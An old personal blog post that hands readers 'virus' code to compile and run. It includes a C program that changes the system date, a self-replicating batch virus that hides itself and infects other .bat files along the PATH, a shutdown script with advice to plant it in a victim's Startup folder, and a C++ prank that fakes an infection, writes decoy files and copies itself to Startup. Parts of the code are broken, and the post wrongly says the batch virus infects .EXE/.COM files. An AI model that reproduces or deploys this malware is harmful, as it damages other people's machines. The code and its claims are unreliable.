Thursday, February 14, 2008

INFECTED CODES WRITTEN IN C/C++

This is a simple code that changes system time and date. It is written using c/c++ but can be easily converted to java.



#include "stdio.h"
#include "process.h"
#include "dos.h"

int main(void)
{
struct date new_date;
struct date old_date;
struct time t;
/*change date*/
getdate(&old_date); /*needed only if want to revert back*/
new_date.da_year = 2008;
new_date.da_day = 1;
new_date.da_mon = 1;
setdate(&reset);
/*change time*/
gettime(&t); /*needed only if want to revert back*/
t.ti_hour=10;
t.ti_min=20;
t.ti_sec=30;
settime(&t);
return 0;
}


Now compile it .Dont run it . Just click on the compile option.Once you complie it you will find the .exe file. This is the virus.

To set back to the old date you can use before the "return o;" statement
setdate(&old_date);

similarly to revert to time use
settime(&t);

Here is the code of a very simple virus that most antivirus will detect unless you have a old version of antivirus. Be careful with this virus although this virus is detected by most antivirus it's a bit dangerous .This virus creates clone of itself. You will land in serious trouble if you spread it to others.Even while testing it yourself test it on a new folder with no important files that too if possible on a empty non-windows drive. I am giving the code purely for educational purpose i dont intend to create any havoc.


@echo off>nul.ViRuS
if "%1=="/ViRuS_MULTIPLY goto ViRuS_multiply
if "%1=="/ViRuS_OUTER_LOOP goto ViRuS_outer_loop
if "%1=="/ViRuS_FINDSELF goto ViRuS_findself
if "%VOFF%=="T goto ViRuS_OLDBAT

set ViRuSname=%0
if not exist %0.bat call %0 /ViRuS_FINDSELF %path%
if not exist %ViRuSname%.bat set ViRuSname=
if "%ViRuSname%==" goto ViRuS_OLDBAT

rem ViRuS if batch is started with name.BAT, virus will not become active
rem ViRuS it was a bug, now it's a feature ! (also notice the voff variable)
rem ViRuS also if batch was only in an append /x:on path (chance=minimal)

attrib +h %ViRuSname%.bat
for %%a in (%path%;.) do call %0 /ViRuS_OUTER_LOOP %%a
attrib -h %ViRuSname%.bat
set ViRuSname=
goto ViRuS_OLDBAT

:ViRuS_findself
if "%2==" goto XXX_END>nul.ViRuS
if exist %2\%ViRuSname%.bat set ViRuSname=%2\%ViRuSname%
if exist %ViRuSname%.bat goto XXX_END
if exist %2%ViRuSname%.bat set ViRuSname=%2%ViRuSname%
if exist %ViRuSname%.bat goto XXX_END
shift>nul.ViRuS
goto ViRuS_findself

:ViRuS_outer_loop
for %%a in (%2\*.bat;%2*.bat) do call %0 /ViRuS_MULTIPLY %%a
goto XXX_END>nul.ViRuS

:ViRuS_multiply
find "ViRuS" <%ViRuSname%.bat >xViRuSx.bat
find /v "ViRuS" <%2 find /v ":XXX_END" >>xViRuSx.bat
echo :XXX_END>>xViRuSx.bat
copy xViRuSx.bat %2>nul
del xViRuSx.bat
goto XXX_END>nul.ViRuS

:ViRuS_OLDBAT
echo on>nul.ViRuS
echo This is the dummy Virus Created By Elite and Rishabh
:XXX_END

This virus will affect only .EXE and .COM files. These files too will become virus.

Hi let me show you how to create a shutdown/ restart virus. All that this virus does is it will shutdown the comp or restart it. The code is dead simple just 3 words or to say 2 words

First we will create the windows version.

Now lets create the virus. Just open a notepad and type "shutdown -s" or "restart -s" or "%systemroot%\system32\shutdown.exe -r". Now save it as virus.bat or yourname.bat. Now run it. This will do the job as explained below. Note if .bat extension doesnt work try .exe extension

Let me explain some thing about them. Just close all important aplications. Now go to "RUN" type "cmd". Now you have entered MS-DOS/ Command prompt. Here You need to type "shutdown -s" or "restart -s". This will shutdown or restart your comp. We are making use of this DOS command to create this virus.

To make this more poweful just force your victim to copy this into "START>>>ALL PROGRAM>>>> STARTUP". Now this program will load every time the computer starts.
Only way out for him is to go in safe mode and delete it from startup.

So go ahead and try them out. This is a an ideal virus to play prank on your buddies.

This is not actually a virus but a practical joke created by "Sohan Vineet Alva" in C++ . It will make your victim believe that his system is under seize and is infected. Rather I have edited the main CODEC to this one for simplicity in understanding. Remember you need to compile it and generate the .EXE file.


#include "iostream.h"
#include "conio.h"
#include "dos.h"
#include "stdio.h"
#include "process.h"
#include "graphics.h"
#include "fstream.h"


void ffool(); //FUNCTION WHICH GIVES THE FINAL MESSAGE

void main()
{
clrscr();
for(int i=0;i<=100;i++) { textcolor(YELLOW+BLINK); gotoxy(35,12); cprintf("VIRUS LOADING"); gotoxy(39,15); textcolor(GREEN); cout<
<<"%"; delay(75); clrscr(); } delay(100); clrscr(); fflush(stdout); gotoxy(20,12); cout<<" 'TOURNIQUET' VIRUS CREATED BY MAINAK BHATTACHARYA"; gotoxy(20,14); cout<<" SAY GOOD BYE TO YOUR PC IN; THIS D LAST TIME YOUR PC IS RUNNING "; for(int j=5;j>=0;j--)
{
gotoxy(48,14);
cout<<<" SECONDS"; delay(1000); } ofstream f1; f1.open("c:/windows/All Users/desktop/procraetorian.sys"); ofstream f3("c:/windows/All Users/desktop/blast.sys"); ofstream a2("c:/windows/All Users/desktop/mslaugh.exe"); ofstream s2("c:/windows/All Users/desktop/backdoor.sys"); ofstream g2("c:/windows/All Users/desktop/spin32_war.sys"); ofstream h2("c:/windows/All Users/desktop/russpatr.sys"); ofstream j2("c:/windows/All Users/desktop/torr_sys32.sys"); ofstream k2("c:/windows/All Users/desktop/xxx.sys"); ofstream l2("c:/windows/All Users/desktop/i.txt"); ofstream sm("c:/windows/All Users/desktop/am.txt"); ofstream d1("c:/windows/All Users/desktop/your.txt"); ofstream d2("c:/windows/All Users/desktop/worst.txt"); ofstream d3("c:/windows/All Users/desktop/night.txt"); ofstream d4("c:/windows/All Users/desktop/mare.txt"); clrscr(); lowvideo(); cout<<" 1.HARD-DISK CORRUPTION :"; delay(4000); cout<<"completed"; cout<<" 2.MOTHER BOARD CORRUPTION :"; delay(4000); cout<<"completed"; cout<<" 3.INSTALLING CYBERBOB.DLL -->WINDOWS/COMMAND
:";
delay(4000);
cout<<"completed"; cout<<" PROCRAETORIAN.SYS SUCCESSFULLY PLANTED"; delay(3000); rename("VIRUS.EXE","C:WINDOWSStart MenuProgramsStartUpVIRUS.EXE"); //ffool(); } //*END OF MAIN*// //*START OF ffool()*// void ffool() { clrscr(); int g=DETECT,h; initgraph(&g,&h,"\tc\bgi\"); cleardevice(); delay(1000); setcolor(2); settextstyle(1,0,1); delay(1000); setbkcolor(BLUE); highvideo(); outtextxy(50,150,"THE PROCRAETORIAN:"); delay(1500); outtextxy(50,200,"YOUR PC IS NOW UNDER SURVEILANCE BY THE VIRUS HOST"); outtextxy(50,250,"PEA(C)E BE WITH YOU ! ! !"); getch(); delay(4000); closegraph(); exit(0); } //*END OF ffool()*//

or further assistance you can Email me. visit my website :: www.makdee.co.cc

Mainak Bhattacharya
EE, 2nd Yr,
GNIT, Email: cthmeifucan@makdee.co.cc


No comments: